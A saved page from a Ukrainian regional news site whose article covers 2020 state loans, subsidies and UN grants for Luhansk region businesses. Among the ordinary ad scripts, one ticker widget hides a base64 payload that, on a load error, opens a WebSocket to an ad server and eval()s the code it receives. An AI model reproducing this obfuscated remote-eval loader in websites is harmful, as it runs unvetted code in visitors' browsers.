<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>

<meta charset="utf-8">
<title>За 2020 год в Луганской области по государственной программе «Доступные кредиты 5-7-9%» выдали 59,0 млн гривень  &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Несмотря на государственную программу, основную помощь в виде программ финансирования, льготных кредитов и грантов предприниматели Луганской области получали от международных организаций. В прошлом году представители бизнеса Луганской области приняли участие в различных программах поддержки">
<meta name="keywords" content="Луганской, области, предпринимательства, гривень, грантов, среднего, малого, кредиты, предприниматели, сумму, предоставлено, инвестиционных, компенсаций, субсидий, субъектам, поддержку, финансовую, «FinancEast», реализации, Несмотря">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="За 2020 год в Луганской области по государственной программе «Доступные кредиты 5-7-9%» выдали 59,0 млн гривень ">
<meta property="og:url" content="http://www.citynews.net.ua/news/85732-za-2020-god-v-luganskoj-oblasti-po-gosudarstvennoj-programme-dostupnye-kredity-5-7-9-vydali-590-mln-griven-.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2021-01/medium/1611907838_money.jpg">
<meta property="og:description" content="В прошлом году представители бизнеса Луганской области приняли участие в различных программах поддержки предпринимательства. По государственной программе «Доступные кредиты 5-7-9%» предприниматели в Луганской области получили кредиты со льготными процентами на сумму 59,0 млн гривен. Об этом">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/85732-za-2020-god-v-luganskoj-oblasti-po-gosudarstvennoj-programme-dostupnye-kredity-5-7-9-vydali-590-mln-griven-.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; За 2020 год в Луганской области по государственной программе «Доступные кредиты 5-7-9%» выдали 59,0 млн гривень </span></div>

<div id='dle-content'><div class="fulls">
<article><h1>За 2020 год в Луганской области по государственной программе «Доступные кредиты 5-7-9%» выдали 59,0 млн гривень </h1>
<a href="http://www.citynews.net.ua/2021/01/29/" ><span class="date">Сегодня, 10:10</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,85732-za-2020-god-v-luganskoj-oblasti-po-gosudarstvennoj-programme-dostupnye-kredity-5-7-9-vydali-590-mln-griven-.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/85732-za-2020-god-v-luganskoj-oblasti-po-gosudarstvennoj-programme-dostupnye-kredity-5-7-9-vydali-590-mln-griven-.html" data-title="За 2020 год в Луганской области по государственной программе «Доступные кредиты 5-7-9%» выдали 59,0 млн гривень "></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><img src="/uploads/posts/2021-01/medium/1611907838_money.jpg" alt="" style="display:block;margin-left:auto;margin-right:auto;">В прошлом году представители бизнеса Луганской области приняли участие в различных программах поддержки предпринимательства.</p>
<p>По государственной программе «Доступные кредиты 5-7-9%» предприниматели в Луганской области получили кредиты со льготными процентами на сумму 59,0 млн гривен. Об этом сообщили в пресс-службе Луганской ОГА.</p>
<p>Кроме того, за период действия программы «FinancEast» в 2020 году финансовую поддержку в виде субсидий и компенсаций предоставлено 69 субъектам малого и среднего предпринимательства для реализации 84 инвестиционных проектов на общую сумму 128,1 млн гривень.</p>
<p>Программой ООН по восстановлению и развитию мира на востоке Украины проведены конкурсы бизнес-грантов среди субъектов малого и среднего предпринимательства. По результатам конкурсов за 2020 год выданы 152 гранта на 26,7 млн гривень.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/ukrainenews/74182-v-ukraine-sozdadut-set-centrov-podderzhki-predprinimatelstva.html">В Украине создадут сеть центров поддержки предпринимательства</a></li><li><a href="http://www.citynews.net.ua/news/27044-v-starobelskom-rayone-prezentovali-regionalnuyu-programmu-razvitiya-vnutrioblastnoy-kooperacii.html">В Старобельском районе презентовали региональную программу развития внутриобластной кооперации</a></li><li><a href="http://www.citynews.net.ua/news/16988-segodnya-deputaty-utverdili-programmu-sodeystviya-razvitiyu-malogo-i-srednego-predprinimatelstva-v-g-luganske-na-2012-2014.html">Депутаты утвердили «Программу содействия развитию малого и среднего предпринимательства в г. Луганске на 2012-2014&quot;</a></li><li><a href="http://www.citynews.net.ua/news/14178-v-luganskoy-oga-obyavlen-konkursnyy-otbor-dlya-firm-kotorye-budut-uchastvovat-v-oblastnoy-celevoy-programme.html">Луганская ОГА ищет фирмы, которым нужна поддержка администрации</a></li><li><a href="http://www.citynews.net.ua/news/3245-v-luganske-vybirajut-predprinimatelejj.html">В Луганске выбирают предпринимателей, кредиты которым оплатит областной бюджет</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Сегодня, 16:47</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85743-vakcina-ot-covid-19-v-ukraine-ozhidaetsja-15-fevralja-no-neizvestno-kakaja.html">Вакцина от COVID-19 в Украине ожидается 15 февраля. Но неизвестно какая</a></h4><span>Сегодня, 15:21</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85742-v-luganskoj-oblasti-s-30-janvarja-ozhidaetsja-oslozhnenie-pogodnyh-uslovij-mokryj-sneg-dozhd-i-gololed.html">В Луганской области с 30 января ожидается осложнение погодных условий: мокрый снег, дождь и гололед</a></h4><span>Сегодня, 15:13</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85741-rossijskie-terroristy-sbrosili-granatu-s-bespilotnika-raneny-2-bojca-vsu.html">Российские террористы сбросили гранату с беспилотника - ранены 2 бойца ВСУ</a></h4><span>Сегодня, 13:05</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85736-prosto-perestat-streljat-ne-rabotaet-v-tkg-zelenskogo-ponjali-chto-s-rossiej-nevozmozhno-dogovoritsja.html">«Просто перестать стрелять» не работает: В ТКГ Зеленского поняли что с Россией невозможно договориться</a></h4><span>Сегодня, 12:54</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85735-v-luganskoj-oblasti-kontrabandistam-narkotikov-dali-po-6-let-zakljuchenija.html">В Луганской области контрабандистам наркотиков дали по 6 лет заключения</a></h4><span>Сегодня, 11:24</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85734-iz-za-snezhnogo-ciklona-v-ukraine-360-naselennyh-punktov-ostalis-bez-jelektrojenergii.html">Из-за снежного циклона в Украине 360 населенных пунктов остались без электроэнергии</a></h4><span>Сегодня, 10:24</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85733-v-luganskoj-oblasti-za-sutki-40-novyh-sluchaev-covid-19-i-odin-umershij.html">В Луганской области за сутки 40 новых случаев COVID-19 и один умерший</a></h4><span>Сегодня, 10:10</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85732-za-2020-god-v-luganskoj-oblasti-po-gosudarstvennoj-programme-dostupnye-kredity-5-7-9-vydali-590-mln-griven-.html">За 2020 год в Луганской области по государственной программе «Доступные кредиты 5-7-9%» выдали 59,0 млн гривень </a></h4><span>Сегодня, 09:44</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85731-rossijskie-terroristy-vozobnovili-obstrely-v-rajone-popasnoj.html">Российские террористы возобновили обстрелы в районе Попасной</a></h4><span>Вчера, 13:52</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85730-v-okkupirovannom-alchevske-bolee-devjatisot-kvartir-ostalis-bez-otoplenija-iz-za-avarii.html">В оккупированном Алчевске более девятисот квартир остались без отопления из-за аварии</a></h4><span>Вчера, 13:38</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85728-v-mid-ukrainy-otreagirovali-na-poezdku-rossijskih-propagandistov-v-okkupirovannyj-donecke.html">В МИД Украины отреагировали на поездку российских пропагандистов в оккупированный Донецке</a></h4><span>Вчера, 12:36</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/85724-v-dnepre-zaderzhana-prestupnaja-gruppa-vorov-iz-odessy-luganska-i-zhitomira.html">В Днепре задержана преступная группа воров из Одессы, Луганска и Житомира</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>Вчера, 13:48</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85729-spasateli-predupredili-o-vysshem-urovne-opasnosti-iz-za-silnyh-snegopadov-v-juzhnyh-i-centralnyh-oblastjah-ukrainy.html">Спасатели предупредили о высшем уровне опасности из-за сильных снегопадов в южных и центральных областях Украины</a></h4><span>Вчера, 12:50</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85727-odessu-zasypalo-snegom.html">Одессу засыпало снегом</a></h4><span>27-01-2021, 10:10</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85711-v-odesse-proschajutsja-s-aktrisoj-irinoj-tokarchuk.html">В Одессе прощаются с актрисой Ириной Токарчук</a></h4><span>23-01-2021, 19:57</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85689-advokatu-iz-kurortnoj-zatoki-juriju-cherednichenko-vrucheno-podozrenie-po-faktu-ugroz-sude.html">Адвокату из курортной Затоки Юрию Чередниченко вручено подозрение по факту угроз судье</a></h4><span>18-01-2021, 13:16</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85641-v-odesse-gorel-otel-2-cheloveka-pogibli.html">В Одессе горел отель - 2 человека погибли</a></h4><span>18-01-2021, 13:08</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85640-v-poltave-perekryli-trassu-kiev-harkov-iz-za-povyshenija-tarifov-na-gaz.html">В Полтаве перекрыли трассу Киев-Харьков из-за повышения тарифов на газ</a></h4><span>15-01-2021, 10:43</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85631-v-kieve-iz-za-moroza-i-snegopada-otmenili-jarmarki.html">В Киеве из-за мороза и снегопада отменили ярмарки</a></h4><span>15-01-2021, 10:36</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85630-v-odesse-otkrojut-2-punkta-obogreva-dlja-bezdomnyh-grazhdan.html">В Одессе откроют 2 пункта обогрева для бездомных граждан</a></h4><span>14-01-2021, 10:54</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85618-v-kieve-kommunalnye-sluzhby-gotovjatsja-k-snegopadam-i-morozam.html">В Киеве коммунальные службы готовятся к снегопадам и морозам</a></h4><span>13-01-2021, 13:56</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85608-v-odesse-neizvestnyj-soobschil-o-zaminirovanii-26-detskih-sadov-suda-i-oblastnoj-prokuratury.html">В Одессе неизвестный сообщил о заминировании 26 детских садов, суда и областной прокуратуры</a></h4><span>11-01-2021, 15:41</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85595-vo-lvovskoj-oblasti-zafiksirovali-nebolshoe-zemletrjasenie.html">Во Львовской области зафиксировали небольшое  землетрясение</a></h4><span>21-12-2020, 14:57</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/85522-v-kieve-medikam-hotjat-doplachivat-ot-2-do-5-tysjach-griven-za-rabotu-s-covid-19.html">В Киеве медикам хотят доплачивать от 2 до 5 тысяч гривень за работу с COVID-19</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
					<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1689781-1";
urchinTracker();
</script>

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('12','2020','right'); return false;" href="http://www.citynews.net.ua/2020/12/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Январь 2021&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="4">&nbsp;</td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/01/" title="Все публикации за 01 января 2021">1</a></td><td  class="weekday" >2</td><td  class="weekday" >3</td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/04/" title="Все публикации за 04 января 2021">4</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/05/" title="Все публикации за 05 января 2021">5</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/06/" title="Все публикации за 06 января 2021">6</a></td><td  class="day" >7</td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/08/" title="Все публикации за 08 января 2021">8</a></td><td  class="weekday" >9</td><td  class="weekday" >10</td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/11/" title="Все публикации за 11 января 2021">11</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/12/" title="Все публикации за 12 января 2021">12</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/13/" title="Все публикации за 13 января 2021">13</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/14/" title="Все публикации за 14 января 2021">14</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/15/" title="Все публикации за 15 января 2021">15</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2021/01/16/" title="Все публикации за 16 января 2021">16</a></td><td  class="weekday" >17</td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/18/" title="Все публикации за 18 января 2021">18</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/19/" title="Все публикации за 19 января 2021">19</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/20/" title="Все публикации за 20 января 2021">20</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/21/" title="Все публикации за 21 января 2021">21</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/22/" title="Все публикации за 22 января 2021">22</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2021/01/23/" title="Все публикации за 23 января 2021">23</a></td><td  class="weekday" >24</td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/25/" title="Все публикации за 25 января 2021">25</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/26/" title="Все публикации за 26 января 2021">26</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/27/" title="Все публикации за 27 января 2021">27</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/28/" title="Все публикации за 28 января 2021">28</a></td><td  class="day-active-v day-current" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/01/29/" title="Все публикации за 29 января 2021">29</a></td><td  class="weekday" >30</td><td  class="weekday" >31</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
        <p>Материалы отмеченные рубрикой Пресс-релизы и Заметки публикуются на правах рекламы</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>За 2020 год в Луганской области по государственной программе «Доступные кредиты 5-7-9%» выдали 59,0 млн гривень  &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Несмотря на государственную программу, основную помощь в виде программ финансирования, льготных кредитов и грантов предприниматели Луганской области получали от международных организаций. В прошлом году представители бизнеса Луганской области приняли участие в различных программах поддержки">
<meta name="keywords" content="Луганской, области, предпринимательства, гривень, грантов, среднего, малого, кредиты, предприниматели, сумму, предоставлено, инвестиционных, компенсаций, субсидий, субъектам, поддержку, финансовую, «FinancEast», реализации, Несмотря">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
